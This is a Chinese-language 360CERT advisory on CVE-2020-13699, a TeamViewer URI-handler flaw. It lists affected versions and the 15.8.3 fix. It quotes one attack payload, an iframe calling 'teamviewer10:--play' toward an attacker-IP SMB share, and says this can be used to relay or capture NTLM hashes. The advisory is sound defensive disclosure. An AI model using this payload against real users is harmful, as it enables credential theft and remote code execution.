360CERT [三六零CERT]???? 昨天

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告_自定义

报告编号:B6-2020-081002

报告作者:360CERT

更新日期:2020-08-10

0x01 漏洞简述

2020年08月10日,360CERT监测发现​​TeamViewer官方​​​发布了​​TeamViewerURL处理​​​的风险通告,该漏洞编号为​​CVE-2020-13699​​​,漏洞等级:​​高危​​​,漏洞评分:​​8.8分​​。

​TeamViewer​​​存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义​​URI​​​处理程序,当安装了​​TeamViewer​​的易受攻击版本的用户访问恶意创建的网站时,可能会被黑客利用。

对此,360CERT建议广大用户及时将​​TeamViewer​​​升级到​​15.8.3​​版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

0x02 风险等级

360CERT对该漏洞的评定结果如下

评定方式

等级

威胁等级

高危

影响面

广泛

360CERT评分

8.8分

0x03 漏洞详情

​TeamViewer​​主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享、网络会议、文件传输等)。

​TeamViewer​​​存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义​​URI​​​处理程序,当安装了​​TeamViewer​​​的易受攻击版本的系统访问恶意创建的网站时,可能会被利用,攻击者可以使用精心制作的URL(​​iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs'​​​)将恶意​​iframe​​​嵌入网站中,这将启动​​TeamViewerWindows​​​桌面客户端并强制其执行以下操作:打开远程​​SMB​​​共享。​​Windows​​​在打开​​SMB​​​共享时将执行​​NTLM​​身份验证,并且可以将请求进行转发(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解)。

0x04 影响版本

TeamViewer<8.0.258861

TeamViewer<9.0.28860

TeamViewer<10.0.258873

TeamViewer<11.0.258870

TeamViewer<12.0.258869

TeamViewer<13.2.36220

TeamViewer<14.2.56676

TeamViewer<15.8.3

0x05 修复建议

通用修补建议:

升级到​​15.8.3​​版本,下载地址为:

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

​https://www.teamviewer.com/en/download/previous-versions/​

0x06 相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘,发现​​TeamViewer​​​在​​全球​​均有广泛使用,具体分布如下图所示。

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告_处理程序_02

0x07 产品侧解决方案

360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段,对该类漏洞进行监测,请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。

CVE-2020-13699: TeamViewer 用户密码破解漏洞通告_搜索_03

0x08 时间线

2020-08-06 TeamViewer发布通告

2020-08-10 360CERT发布通告

0x09 参考链接

1、 Statement on CVE 2020-13699

​https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448​

2、 TeamViewer flaw could be exploited to crack users’ password

​https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/​